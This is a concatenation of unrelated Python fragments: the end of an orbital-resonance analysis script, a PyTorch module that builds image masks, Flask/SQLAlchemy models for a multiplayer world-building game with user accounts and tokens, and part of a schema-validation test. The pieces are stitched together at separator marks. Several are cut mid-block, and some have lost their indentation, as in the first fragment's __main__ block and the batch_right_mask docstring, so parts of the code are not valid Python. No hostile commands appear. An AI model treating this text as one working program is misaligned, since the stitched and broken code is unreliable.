        opened by the __main__ driver — it is not defined in this class;
        confirm before reuse.
        """
        TestParticleSample = sys.argv[1]
        TestParticleTime, Index, SemiMajorAxis, Eccentricity, Inclination, Omega, omega, AngularPosition, Longitude = np.genfromtxt(
            "tp" + TestParticleSample + ".out", unpack=True)
        TextFile.write((str(self.Index) + " " +str(SemiMajorAxis[IndexCount]) + " " + str(Eccentricity[IndexCount]) + " " + str(Inclination[IndexCount]) + " " + str(Omega[IndexCount]) + " " + str(omega[IndexCount]) + " " + str(AngularPosition[IndexCount]) + " " + str(self.Name) + " " + str(self.AverageSMA) + " " + str(self.AverageEccentricity) + " " + str(self.AverageInclination) + " " + str(self.ResonanceCenter) + " " + str(self.ResonanceAmplitude) + " " + str(self.SMACenter) + " " + str(self.SMAamplitude) + " " + '\n'))
# Main function
if __name__ == '__main__':
TestParticleSample = sys.argv[1] # User to enter the number indicating the file number
Index = np.genfromtxt('tp' + TestParticleSample + ".out", usecols=1, unpack=True)
NumberOfTPs = max(Index) # Assuming there is more than one | |
<gh_stars>10-100
import numpy as np
import torch
from torch.utils.data import DataLoader, Dataset
from torchvision import datasets, transforms
class MaskGenerator():
    """Factory for binary visibility masks of shape (batch, 1, H, W).

    Parameters
    ----------
    img_size : tuple of ints
        Image shape, e.g. (1, 28, 28) or (3, 64, 64).
    mask_descriptor : tuple
        (mask_type, mask_attribute) pair selecting the mask family:
        'random' (attribute None, an int, or a (low, high) pair bounding
        the number of visible pixels), 'bottom' / 'top' (int rows),
        'center' (int side of the visible square), 'edge' (int thickness),
        'left' / 'right' (int columns), 'random_rect' ((max_h, max_w)),
        'random_blob' ((num_blobs, (iter_low, iter_high), threshold)) and
        'random_blob_cache' ((folder, batch_size) of pregenerated masks).
    """
    def __init__(self, img_size, mask_descriptor):
        self.img_size = img_size
        self.num_pixels = img_size[1] * img_size[2]
        self.mask_type, self.mask_attribute = mask_descriptor
        if self.mask_type == 'random_blob_cache':
            # Pregenerated masks live on disk; serve them via a shuffled loader.
            to_gray = transforms.Compose([transforms.Grayscale(),
                                          transforms.ToTensor()])
            cache = datasets.ImageFolder(self.mask_attribute[0],
                                         transform=to_gray)
            self.data_loader = DataLoader(cache,
                                          batch_size=self.mask_attribute[1],
                                          shuffle=True)
    def get_masks(self, batch_size):
        """Return a (batch_size, 1, img_size[1], img_size[2]) tensor of masks
        generated according to the descriptor given at construction time."""
        attr = self.mask_attribute
        if self.mask_type == 'random':
            if attr is None:
                # Visible-pixel count sampled uniformly per mask.
                counts = np.random.randint(1, self.num_pixels, size=batch_size)
                return batch_random_mask(self.img_size, counts, batch_size)
            if type(attr) == int:
                return batch_random_mask(self.img_size, attr, batch_size)
            low, high = attr
            counts = np.random.randint(low, high, size=batch_size)
            return batch_random_mask(self.img_size, counts, batch_size)
        if self.mask_type == 'bottom':
            return batch_bottom_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'top':
            return batch_top_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'center':
            return batch_center_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'edge':
            return batch_edge_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'left':
            return batch_left_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'right':
            return batch_right_mask(self.img_size, attr, batch_size)
        if self.mask_type == 'random_rect':
            return batch_random_rect_mask(self.img_size, attr[0], attr[1],
                                          batch_size)
        if self.mask_type == 'random_blob':
            return batch_multi_random_blobs(self.img_size, attr[0], attr[1],
                                            attr[2], batch_size)
        if self.mask_type == 'random_blob_cache':
            # Grab a single batch from the (shuffled) cache loader.
            for cached in self.data_loader:
                break
            # ImageFolder yields (img, label); only the images are wanted.
            return cached[0]
def single_random_mask(img_size, num_visible):
    """Return a random mask where 0 marks a hidden and 1 a visible pixel.

    Parameters
    ----------
    img_size : tuple of ints
        E.g. (1, 32, 32) for grayscale or (3, 64, 64) for RGB; only the
        spatial dimensions are used — the result always has 1 channel.
    num_visible : int
        Number of pixels set to 1, sampled uniformly without replacement.

    Returns
    -------
    torch.Tensor of shape (1, height, width).
    """
    _, height, width = img_size
    # Sample pixel indices without replacement; each index identifies one
    # visible pixel in row-major order.
    measurements = np.random.choice(range(height * width), size=num_visible, replace=False)
    # Bug fix: allocate (1, height, width) to match img_size. The original
    # used torch.zeros(1, width, height), which produced a wrongly-shaped
    # mask (and IndexError on assignment) for non-square images.
    mask = torch.zeros(1, height, width)
    # Update mask with measurements
    for m in measurements:
        row, col = divmod(int(m), width)
        mask[0, row, col] = 1
    return mask
def batch_random_mask(img_size, num_visibles, batch_size, repeat=False):
    """Return a batch of random masks of shape (batch_size, 1, H, W).

    Parameters
    ----------
    img_size : see single_random_mask
    num_visibles : int or list of ints
        If int, every mask has that many visible pixels; if a sequence,
        mask i gets num_visibles[i] visible pixels (length == batch_size).
    batch_size : int
        Number of masks to create.
    repeat : bool
        If True, one mask is generated and repeated batch_size times
        (num_visibles must then be an int).

    Raises
    ------
    RuntimeError
        If repeat=True and num_visibles is not an int.
    """
    # Mask has the image's spatial shape but always a single channel.
    mask_batch = torch.zeros(batch_size, 1, *img_size[1:])
    if repeat:
        # isinstance replaces the non-idiomatic `type(x) == int` check.
        if not isinstance(num_visibles, int):
            raise RuntimeError("num_visibles must be an int if used with repeat=True. {} was provided instead.".format(type(num_visibles)))
        single_mask = single_random_mask(img_size, num_visibles)
        for i in range(batch_size):
            mask_batch[i] = single_mask
    elif isinstance(num_visibles, int):
        for i in range(batch_size):
            mask_batch[i] = single_random_mask(img_size, num_visibles)
    else:
        for i in range(batch_size):
            mask_batch[i] = single_random_mask(img_size, num_visibles[i])
    return mask_batch
def batch_bottom_mask(img_size, num_rows, batch_size):
    """Return masks exposing only the lowest |num_rows| rows.

    Parameters
    ----------
    img_size : see single_random_mask
    num_rows : int
        Number of rows from the bottom which will be visible.
    batch_size : int
        Number of masks to create.

    Returns
    -------
    torch.Tensor of shape (batch_size, 1, height, width).
    """
    mask = torch.zeros(batch_size, 1, *img_size[1:])
    # Edge-case fix: with num_rows == 0 the slice `-0:` selects the WHOLE
    # dimension, which made the entire image visible instead of none of it.
    if num_rows > 0:
        mask[:, :, -num_rows:, :] = 1.
    return mask
def batch_top_mask(img_size, num_rows, batch_size):
    """Return masks exposing only the top |num_rows| rows (height dim).

    Parameters
    ----------
    img_size : see single_random_mask
    num_rows : int
        Number of rows from the top which stay visible.
    batch_size : int
        Number of masks to create.
    """
    masks = torch.zeros(batch_size, 1, *img_size[1:])
    masks[:, :, :num_rows, :] = 1.
    return masks
def batch_center_mask(img_size, num_pixels, batch_size):
    """Return masks exposing only the central num_pixels x num_pixels square.

    Parameters
    ----------
    img_size : see single_random_mask
    num_pixels : int
        Side of the visible square; should be even (an odd value behaves
        like num_pixels - 1 due to the int() truncation below).
    batch_size : int
        Number of masks to create.
    """
    masks = torch.zeros(batch_size, 1, *img_size[1:])
    _, height, width = img_size
    half = num_pixels / 2
    row_lo = int(height / 2 - half)
    row_hi = int(height / 2 + half)
    col_lo = int(width / 2 - half)
    col_hi = int(width / 2 + half)
    masks[:, :, row_lo:row_hi, col_lo:col_hi] = 1.
    return masks
def batch_edge_mask(img_size, num_pixels, batch_size):
    """Return masks exposing only a num_pixels-thick border of the image.

    Parameters
    ----------
    img_size : see single_random_mask
    num_pixels : int
        Border thickness; should be smaller than min(height/2, width/2).
    batch_size : int
        Number of masks to create.
    """
    mask = torch.zeros(batch_size, 1, *img_size[1:])
    # Edge-case fix: with num_pixels == 0 the slices `-0:` select the WHOLE
    # dimension, which made the entire image visible instead of none of it.
    if num_pixels > 0:
        mask[:, :, :num_pixels, :] = 1.
        mask[:, :, -num_pixels:, :] = 1.
        mask[:, :, :, :num_pixels] = 1.
        mask[:, :, :, -num_pixels:] = 1.
    return mask
def batch_left_mask(img_size, num_cols, batch_size):
    """Return masks exposing only the leftmost |num_cols| columns.

    Parameters
    ----------
    img_size : see single_random_mask
    num_cols : int
        Number of columns on the left that remain visible.
    batch_size : int
        Number of masks to create.
    """
    masks = torch.zeros(batch_size, 1, *img_size[1:])
    masks[:, :, :, :num_cols] = 1.
    return masks
def batch_right_mask(img_size, num_cols, batch_size):
"""Masks all the pixels except the right side of the image.
Parameters
----------
img_size : see single_random_mask
num_cols : int
Number of columns of the right side of the image to remain visible.
batch_size : | |
from datetime import datetime
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from markdown import markdown
import bleach
from flask import current_app, request
from flask.ext.login import UserMixin, AnonymousUserMixin
from . import db, login_manager
from random import randint
class Permission:
    """Bit-flag permission constants.

    Values are OR-ed together into Role.permissions and tested with
    User.can(); 0xff (Administrator) grants everything.
    """
    FOLLOW = 0x01
    COMMENT = 0x02
    WRITE_ARTICLES = 0x04
    MODERATE_COMMENTS = 0x08
    ADMINISTER = 0x80
class Role(db.Model):
    """Named bundle of Permission bits; each User references one Role."""
    __tablename__ = 'roles'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64), unique=True)
    default = db.Column(db.Boolean, default=False, index=True)
    permissions = db.Column(db.Integer)
    users = db.relationship('User', backref='role', lazy='dynamic')
    @staticmethod
    def insert_roles():
        """Create or refresh the built-in roles (idempotent)."""
        roles = {
            'User': (Permission.FOLLOW |
                     Permission.COMMENT |
                     Permission.WRITE_ARTICLES, True),
            'Moderator': (Permission.FOLLOW |
                          Permission.COMMENT |
                          Permission.WRITE_ARTICLES |
                          Permission.MODERATE_COMMENTS, False),
            'Administrator': (0xff, False)
        }
        for role_name, (perm_bits, is_default) in roles.items():
            role = Role.query.filter_by(name=role_name).first()
            if role is None:
                role = Role(name=role_name)
            # Always resync bits/default so edits to the table above apply.
            role.permissions = perm_bits
            role.default = is_default
            db.session.add(role)
        db.session.commit()
    def __repr__(self):
        return '<Role %r>' % self.name
# Association table for the many-to-many User <-> World membership
# (which players participate in which game worlds).
player_world_table = db.Table('player_worlds', db.Model.metadata,
                              db.Column('player_id', db.Integer,
                                        db.ForeignKey('users.id')),
                              db.Column('world_id', db.Integer,
                                        db.ForeignKey('world.id')))
class User(UserMixin, db.Model):
    """Registered account: auth credentials, profile data and game links."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(64), unique=True, index=True)
    username = db.Column(db.String(64), unique=True, index=True)
    role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
    password_hash = db.Column(db.String(128))
    confirmed = db.Column(db.Boolean, default=False)
    name = db.Column(db.String(64))
    location = db.Column(db.String(64))
    about_me = db.Column(db.Text())
    member_since = db.Column(db.DateTime(), default=datetime.utcnow)
    last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
    avatar_hash = db.Column(db.String(32))
    posts = db.relationship('Post', backref='author', lazy='dynamic')
    armies = db.relationship('Armies', backref='army_owner', lazy='dynamic')
    turnlog = db.relationship('TurnLog', backref='player_turn', lazy='dynamic')
    events = db.relationship('Events', backref='player_event', lazy='dynamic')
    races = db.relationship('Race', backref='race_creator', lazy='dynamic')
    avatars = db.relationship('Avatars', backref='avatar_owner', lazy='dynamic')
    orders = db.relationship('Orders', backref='order_owner', lazy='dynamic')
    owned_worlds = db.relationship('World', backref='world_owner', lazy='dynamic')
    worlds = db.relationship('World',
                             secondary=player_world_table,
                             backref =db.backref('players', lazy='dynamic'),
                             lazy='dynamic')
    points = db.relationship('PowerPoints', backref='player_points',lazy='dynamic')
    @staticmethod
    def generate_fake(count=100):
        """Populate the users table with |count| random accounts (dev/test)."""
        from sqlalchemy.exc import IntegrityError
        from random import seed
        import forgery_py
        seed()
        for i in range(count):
            u = User(email=forgery_py.internet.email_address(),
                     username=forgery_py.internet.user_name(True),
                     # Fix: the anonymised placeholder `<PASSWORD>()` was not
                     # valid Python; use a random word as the fake password.
                     password=forgery_py.lorem_ipsum.word(),
                     confirmed=True,
                     name=forgery_py.name.full_name(),
                     location=forgery_py.address.city(),
                     about_me=forgery_py.lorem_ipsum.sentence(),
                     member_since=forgery_py.date.date(True))
            db.session.add(u)
            try:
                db.session.commit()
            except IntegrityError:
                # Duplicate email/username: skip this one and keep going.
                db.session.rollback()
    def __init__(self, **kwargs):
        """Assign a default role and cache the Gravatar hash on creation."""
        super(User, self).__init__(**kwargs)
        if self.role is None:
            if self.email == current_app.config['FLASKY_ADMIN']:
                self.role = Role.query.filter_by(permissions=0xff).first()
            if self.role is None:
                self.role = Role.query.filter_by(default=True).first()
        if self.email is not None and self.avatar_hash is None:
            self.avatar_hash = hashlib.md5(
                self.email.encode('utf-8')).hexdigest()
    @property
    def password(self):
        """Write-only: only the hash is stored; reading raises."""
        raise AttributeError('password is not a readable attribute')
    @password.setter
    def password(self, password):
        self.password_hash = generate_password_hash(password)
    def verify_password(self, password):
        """Return True if |password| matches the stored hash."""
        return check_password_hash(self.password_hash, password)
    def generate_confirmation_token(self, expiration=3600):
        """Signed token used to confirm the account's email address."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'confirm': self.id})
    def confirm(self, token):
        """Mark the account confirmed if |token| is valid for this user."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except:
            return False
        if data.get('confirm') != self.id:
            return False
        self.confirmed = True
        db.session.add(self)
        return True
    def generate_reset_token(self, expiration=3600):
        """Signed token authorising a password reset."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'reset': self.id})
    def reset_password(self, token, new_password):
        """Set a new password when |token| is a valid reset token."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except:
            return False
        if data.get('reset') != self.id:
            return False
        # Fix: the anonymised placeholder `<PASSWORD>` was not valid Python;
        # store the caller-supplied password (hashed by the setter above).
        self.password = new_password
        db.session.add(self)
        return True
    def generate_email_change_token(self, new_email, expiration=3600):
        """Signed token authorising a change to |new_email|."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'change_email': self.id, 'new_email': new_email})
    def change_email(self, token):
        """Apply an email change if |token| is valid and the address is free."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except:
            return False
        if data.get('change_email') != self.id:
            return False
        new_email = data.get('new_email')
        if new_email is None:
            return False
        if self.query.filter_by(email=new_email).first() is not None:
            return False
        self.email = new_email
        # Keep the cached Gravatar hash in sync with the new address.
        self.avatar_hash = hashlib.md5(
            self.email.encode('utf-8')).hexdigest()
        db.session.add(self)
        return True
    def can(self, permissions):
        """True if this user's role includes every bit in |permissions|."""
        return self.role is not None and \
            (self.role.permissions & permissions) == permissions
    def is_administrator(self):
        return self.can(Permission.ADMINISTER)
    def ping(self):
        """Refresh last_seen; called on each authenticated request."""
        self.last_seen = datetime.utcnow()
        db.session.add(self)
    def gravatar(self, size=100, default='identicon', rating='g'):
        """Build a Gravatar URL matching the request's HTTP/HTTPS scheme."""
        if request.is_secure:
            url = 'https://secure.gravatar.com/avatar'
        else:
            url = 'http://www.gravatar.com/avatar'
        hash = self.avatar_hash or hashlib.md5(
            self.email.encode('utf-8')).hexdigest()
        return '{url}/{hash}?s={size}&d={default}&r={rating}'.format(
            url=url, hash=hash, size=size, default=default, rating=rating)
    def __repr__(self):
        return '<User %r>' % self.username
    def get_id(self):
        return self.id
    def return_points_obj(self,world_id):
        """Return this player's PowerPoints row for |world_id|, or a fresh
        zero-point object when none exists yet."""
        points = self.points.filter_by(world=world_id).first()
        try:
            points.points >= 0
        except:
            points = PowerPoints()
            points.points = 0
        return points
    def is_anon(self):
        return False
class AnonymousUser(AnonymousUserMixin):
    """Stand-in for unauthenticated visitors; mirrors User's game-side API."""
    def can(self, permissions):
        # Anonymous visitors hold no permissions at all.
        return False
    def is_administrator(self):
        return False
    def return_points_obj(self,world_id):
        """Return a dummy PowerPoints object; -1 signals 'no points' to callers."""
        points = PowerPoints()
        points.points = -1
        return points
    def is_anon(self):
        return True
# Install the anonymous-user class so current_user is never None.
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: look the user up by primary key per request."""
    return User.query.get(user_id)
class Post(db.Model):
    """User-authored post; body_html is a sanitised rendering of body."""
    __tablename__ = 'posts'
    id = db.Column(db.Integer, primary_key=True)
    body = db.Column(db.Text)
    body_html = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    @staticmethod
    def generate_fake(count=100):
        """Create |count| random posts attributed to random users (dev/test)."""
        from random import seed, randint
        import forgery_py
        seed()
        user_count = User.query.count()
        for i in range(count):
            u = User.query.offset(randint(0, user_count - 1)).first()
            p = Post(body=forgery_py.lorem_ipsum.sentences(randint(1, 5)),
                     timestamp=forgery_py.date.date(True),
                     author=u)
            db.session.add(p)
            db.session.commit()
    @staticmethod
    def on_changed_body(target, value, oldvalue, initiator):
        """SQLAlchemy 'set' listener: re-render body markdown into clean HTML."""
        allowed_tags = ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code',
                        'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul',
                        'h1', 'h2', 'h3', 'p']
        # markdown -> HTML, strip disallowed tags, then linkify bare URLs.
        target.body_html = bleach.linkify(bleach.clean(
            markdown(value, output_format='html'),
            tags=allowed_tags, strip=True))
# Keep body_html in sync whenever Post.body is assigned.
db.event.listen(Post.body, 'set', Post.on_changed_body)
from app import db
from hashlib import md5
from flask import url_for
# Association table for the many-to-many Orders <-> WorldMap link
# (which map provinces an order touches).
order_location_table = db.Table('order_location', db.Model.metadata,
                                db.Column('order_id', db.Integer,
                                          db.ForeignKey('orders.id')),
                                db.Column('location_id', db.Integer,
                                          db.ForeignKey('worldmap.id')))
class OrderTypes(db.Model):
    """Lookup table of order categories."""
    id = db.Column(db.Integer, primary_key = True)
    text = db.Column(db.String(64))
    # Fix: declared as @staticmethod for consistency with Role.insert_roles;
    # without it, `OrderTypes.insert_orders()` is an unbound-method error on
    # the Python 2-era Flask stack this module targets.
    @staticmethod
    def insert_orders():
        """Seed the order-type rows (idempotent)."""
        # NOTE(review): 'Cultural Religion' looks like a typo (perhaps
        # 'Cultural'), but it is a persisted value -- confirm before changing.
        orders = ('Cultural Religion', 'Religious', "Military","Trade","Criminal","Technology","Magic")
        for o in orders:
            order = OrderTypes.query.filter_by(text=o).first()
            if order is None:
                order = OrderTypes(text=o)
            db.session.add(order)
        db.session.commit()
class WorldMap(db.Model):
    """One tile of a world's grid: terrain, occupying race, and contents."""
    __tablename__ = 'worldmap'
    id = db.Column(db.Integer, primary_key=True)
    world = db.Column(db.Integer, db.ForeignKey('world.id'))
    race = db.Column(db.Integer, db.ForeignKey('race.id'), default=0)
    race_color = db.Column(db.Integer, default=0)
    letter_coord = db.Column(db.Integer)
    number_coord = db.Column(db.Integer)
    terrain = db.Column(db.String(16))
    image = db.Column(db.String(16))
    city = db.relationship("City", backref='world_location', lazy='dynamic')
    has_city = db.Column(db.Integer)
    army = db.relationship("Armies", backref='worldmap_id', lazy='dynamic')
    events = db.relationship("Events", backref="worldmap_event_id", lazy='dynamic')
    prov_bldg = db.relationship("BldgProv", backref="worldmap", lazy='dynamic')
    avatars = db.relationship("Avatars", backref="worldmap_avatar", lazy='dynamic')

    def coords(self):
        """Tile position rendered as "<letter>x/<number>y"."""
        x_txt = str(self.letter_coord) + "x/"
        y_txt = str(self.number_coord) + "y"
        return x_txt + y_txt

    def regen_coords(self):
        """Coordinate dict used when regenerating map data."""
        coord_pair = {"y": self.number_coord, "x": int(self.letter_coord), }
        return coord_pair

    def return_image(self):
        """Static URL for this tile's terrain image."""
        image_path = "image/" + self.image
        return url_for('static', filename=image_path)

    def return_race(self):
        """Race row occupying this tile (may be None)."""
        occupant = Race.query.get(self.race)
        return occupant

    def return_live_city(self):
        """The single living city on this tile, if any."""
        living = self.city.filter_by(is_alive=1)
        return living.first()

    def return_live_provbldge(self):
        """All living provincial buildings on this tile."""
        living = self.prov_bldg.filter_by(is_alive=1)
        return living.all()

    def return_ruin_city(self):
        """All ruined (dead) cities on this tile."""
        ruined = self.city.filter_by(is_alive=0)
        return ruined.all()

    def return_ruin_provbldg(self):
        """All ruined provincial buildings on this tile."""
        ruined = self.prov_bldg.filter_by(is_alive=0)
        return ruined.all()
class World(db.Model):
    """A game world: age/turn bookkeeping plus relationships to everything
    that lives inside it (races, cities, armies, events, orders, ...)."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64), index=True, unique=True)
    age = db.Column(db.Integer, index=True, default=1)
    turn_of_age = db.Column(db.Integer, index=True, default=1)
    total_turns = db.Column(db.Integer, index=True, default=1)
    races = db.relationship('Race', backref='homeworld', lazy='dynamic')
    active = db.Column(db.Integer, default=0)
    cities = db.relationship('City', backref='city_homeworld', lazy='dynamic')
    avatars = db.relationship("Avatars", backref='avatar_homeworld', lazy='dynamic')
    turnlog = db.relationship("TurnLog", backref='turnlog_homeworld', lazy='dynamic')
    event = db.relationship("Events", backref='event_homeworld', lazy='dynamic')
    orders = db.relationship("Orders", backref='order_homeworld', lazy='dynamic')
    provbldg = db.relationship("BldgProv", backref="world", lazy='dynamic')
    armies = db.relationship("Armies", backref="worldid", lazy='dynamic')
    history = db.relationship("WorldHistory", backref="worldbackref", lazy='dynamic')
    points = db.relationship('PowerPoints', backref='world_points', lazy='dynamic')
    size = db.Column(db.Integer, default=50)
    owner = db.Column(db.Integer, db.ForeignKey('users.id'))

    def __repr__(self):
        return '<World %r>' % (self.name)

    def age_turn(self):
        # Compact "A<age>:T<turn>" label used in the UI.
        return "A" + str(self.age) + ":T" + str(self.turn_of_age)

    def ret_history(self):
        # World history entries, newest first.
        return WorldHistory.query.filter_by(world=self.id).order_by(WorldHistory.id.desc())

    def delete_self(self):
        """Delete this world and every row that belongs to it.

        NOTE(review): rows are removed in a deliberate order (dependents
        before their owners — e.g. an order's locations before the order,
        and each race's/city's remove_stuff() before the race/city itself)
        so foreign-key links are not left dangling; do not reorder.
        """
        for each in self.provbldg.all():
            db.session.delete(each)
        for each in self.armies.all():
            db.session.delete(each)
        for each in self.history.all():
            db.session.delete(each)
        for each in self.points.all():
            db.session.delete(each)
        for each in self.avatars.all():
            db.session.delete(each)
        for each in self.event.all():
            db.session.delete(each)
        for each in self.orders.all():
            # Remove the order's map locations before the order itself.
            for location in each.locations.all():
                db.session.delete(location)
            db.session.delete(each)
        for each in Race.query.filter_by(world_id=self.id).all():
            each.remove_stuff()
            db.session.delete(each)
        for each in self.cities:
            each.remove_stuff()
            db.session.delete(each)
        for each in WorldMap.query.filter_by(world=self.id).all():
            db.session.delete(each)
        # Single commit at the end so the whole teardown is one transaction.
        db.session.commit()
class Race(db.Model):
    """A culture/race living in a world, with its holdings and lineage."""
    id = db.Column(db.Integer, primary_key=True)
    world_id = db.Column(db.Integer, db.ForeignKey('world.id'))
    # Check culture_name when calling to make certain unique per world
    culture_name = db.Column(db.String(128), index=True)
    race_name = db.Column(db.String(64))
    map_color = db.Column(db.Integer)
    alignment = db.Column(db.Integer)
    creator = db.Column(db.Integer, db.ForeignKey('users.id'))
    abs_turn_made = db.Column(db.Integer)
    age_turn = db.Column(db.String(64))
    # subrace - 0 or race_id
    subrace = db.Column(db.Integer, default=0)
    controlled_cities = db.relationship('City', backref='city_builders', lazy='dynamic')
    controlled_provbldg = db.relationship('BldgProv', backref='bldgprov_builders', lazy='dynamic')
    armies = db.relationship('Armies', backref='culture', lazy='dynamic')
    orders = db.relationship("Orders", backref='founders', lazy='dynamic')
    religion = db.Column(db.Integer)
    location = db.relationship("WorldMap", backref='race_location', lazy='dynamic')
    advances = db.relationship("RaceAdvances", backref="race_obj", lazy='dynamic')

    def remove_stuff(self):
        """Delete this race's dependent rows (part of deleting a world)."""
        for related in (self.advances, self.location, self.armies):
            for row in related.all():
                db.session.delete(row)
        db.session.commit()

    def subrace_of(self):
        """Culture name of the parent race, or the string "None" for a root race."""
        if self.subrace == 0:
            return "None"
        parent = Race.query.get(self.subrace)
        return parent.culture_name

    def made_by(self):
        """Name of the creating user, or "Orphaned" when no creator is set."""
        if self.creator == 0 or self.creator is None:
            return "Orphaned"
        return User.query.get(self.creator).name

    def get_religion(self):
        """The Orders row acting as this race's religion, or None if unset."""
        if self.religion == 0 or self.religion is None:
            return None
        return Orders.query.get(self.religion)
class City(db.Model):
    """A city on the world map, tracking ownership, buildings and history."""
    id = db.Column(db.Integer, primary_key=True)
    world_id = db.Column(db.Integer, db.ForeignKey('world.id'))
    name = db.Column(db.String(64))
    # Building Race's ID
    built_by = db.Column(db.Integer)
    owned_by = db.Column(db.Integer, db.ForeignKey('race.id'))
    location = db.Column(db.Integer, db.ForeignKey('worldmap.id'))
    alignment = db.Column(db.Integer)
    buildings = db.relationship("BldgCity", backref="bldg_here", lazy='dynamic')
    armies = db.relationship("Armies", backref='army_built_here', lazy='dynamic')
    age_turn = db.Column(db.String(64))
    turn_built = db.Column(db.Integer)
    is_alive = db.Column(db.Integer, default=1)
    destroyed_in = db.Column(db.Integer)
    history = db.relationship("CityHistory", backref="history", lazy='dynamic')
    orders = db.relationship("Order_City", backref="order_city_cityobj", lazy='dynamic')
    advances = db.relationship("CityAdvances", backref="city_obj", lazy='dynamic')

    def remove_stuff(self):
        """Delete dependent rows (buildings, history, advances).

        No commit here — the caller (e.g. World.delete_self) commits.
        """
        for related in (self.buildings, self.history, self.advances):
            for row in related.all():
                db.session.delete(row)

    def builder_name(self):
        """Culture name of the race that founded this city."""
        return Race.query.get(self.built_by).culture_name

    def owner_name(self):
        """Current owner's culture name, or "Ruins" for a dead city."""
        if not self.is_alive:
            return "Ruins"
        return Race.query.get(self.owned_by).culture_name

    def ret_history(self):
        """History entries for this city, newest first."""
        return CityHistory.query.filter_by(cityid=self.id).order_by(CityHistory.id.desc())

    def return_location(self):
        """The WorldMap tile this city stands on."""
        return WorldMap.query.get(self.location)

    def return_owner_player(self):
        """Id of the user controlling the owning race."""
        owning_race = Race.query.get(self.owned_by)
        controlling_player = User.query.get(owning_race.creator)
        return controlling_player.id
class BldgCity(db.Model):
    """A building constructed inside a city (see the built_in foreign key)."""
    id = db.Column(db.Integer, primary_key = True)
    name = db.Column(db.String(64))
    desc = db.Column(db.String(64))
    built_in = db.Column(db.Integer, db.ForeignKey('city.id'))
    # age_turn mirrors World.age_turn()'s "A<age>:T<turn>" label format —
    # presumably stamped at construction time; confirm against callers.
    age_turn = db.Column(db.String(64))
    turn_built = db.Column(db.Integer)
class | |
Entries:
valid_schema_keys = (
'name', 'private', 'required', 'type', 'values', 'min', 'max',
'regex', 'default', 'list', 'delim', 'prefix', 'map_to', 'alias_of',
)
for entry in details['schemas']:
# Track the map_to entries (if specified); We need to make sure that
# these properly map back
map_to_entries = set()
# Track the alias_of entries
map_to_aliases = set()
# A Service Name MUST be defined
assert 'service_name' in entry
assert isinstance(entry['service_name'], six.string_types)
# Acquire our protocols
protocols = parse_list(
entry['protocols'], entry['secure_protocols'])
# At least one schema/protocol MUST be defined
assert len(protocols) > 0
# our details
assert 'details' in entry
assert isinstance(entry['details'], dict)
# All schema details should include args
for section in ['kwargs', 'args', 'tokens']:
assert section in entry['details']
assert isinstance(entry['details'][section], dict)
for key, arg in entry['details'][section].items():
# Validate keys (case-sensitive)
assert len([k for k in arg.keys()
if k not in valid_schema_keys]) == 0
# Test our argument
assert isinstance(arg, dict)
if 'alias_of' not in arg:
# Minimum requirement of an argument
assert 'name' in arg
assert isinstance(arg['name'], six.string_types)
assert 'type' in arg
assert isinstance(arg['type'], six.string_types)
assert is_valid_type_re.match(arg['type']) is not None
if 'min' in arg:
assert arg['type'].endswith('float') \
or arg['type'].endswith('int')
assert isinstance(arg['min'], (int, float))
if 'max' in arg:
# If a min and max was specified, at least check
# to confirm the min is less then the max
assert arg['min'] < arg['max']
if 'max' in arg:
assert arg['type'].endswith('float') \
or arg['type'].endswith('int')
assert isinstance(arg['max'], (int, float))
if 'private' in arg:
assert isinstance(arg['private'], bool)
if 'required' in arg:
assert isinstance(arg['required'], bool)
if 'prefix' in arg:
assert isinstance(arg['prefix'], six.string_types)
if section == 'kwargs':
# The only acceptable prefix types for kwargs
assert arg['prefix'] in (':', '+', '-')
else:
# kwargs requires that the 'prefix' is defined
assert section != 'kwargs'
if 'map_to' in arg:
# must be a string
assert isinstance(arg['map_to'], six.string_types)
# Track our map_to object
map_to_entries.add(arg['map_to'])
else:
map_to_entries.add(key)
# Some verification
if arg['type'].startswith('choice'):
# choice:bool is redundant and should be swapped to
# just bool
assert not arg['type'].endswith('bool')
# Choices require that a values list is provided
assert 'values' in arg
assert isinstance(arg['values'], (list, tuple))
assert len(arg['values']) > 0
# Test default
if 'default' in arg:
# if a default is provided on a choice object,
# it better be in the list of values
assert arg['default'] in arg['values']
if arg['type'].startswith('bool'):
# Boolean choices are less restrictive but require a
# default value
assert 'default' in arg
assert isinstance(arg['default'], bool)
if 'regex' in arg:
# Regex must ALWAYS be in the format (regex, option)
assert isinstance(arg['regex'], (tuple, list))
assert len(arg['regex']) == 2
assert isinstance(arg['regex'][0], six.string_types)
assert arg['regex'][1] is None or isinstance(
arg['regex'][1], six.string_types)
# Compile the regular expression to verify that it is
# valid
try:
re.compile(arg['regex'][0])
except:
assert '{} is an invalid regex'\
.format(arg['regex'][0])
# Regex should always start and/or end with ^/$
assert re.match(
r'^\^.+?$', arg['regex'][0]) is not None
assert re.match(
r'^.+?\$$', arg['regex'][0]) is not None
if arg['type'].startswith('list'):
# Delimiters MUST be defined
assert 'delim' in arg
assert isinstance(arg['delim'], (list, tuple))
assert len(arg['delim']) > 0
else: # alias_of is in the object
# Ensure we're not already in the tokens section
# The alias_of object has no value here
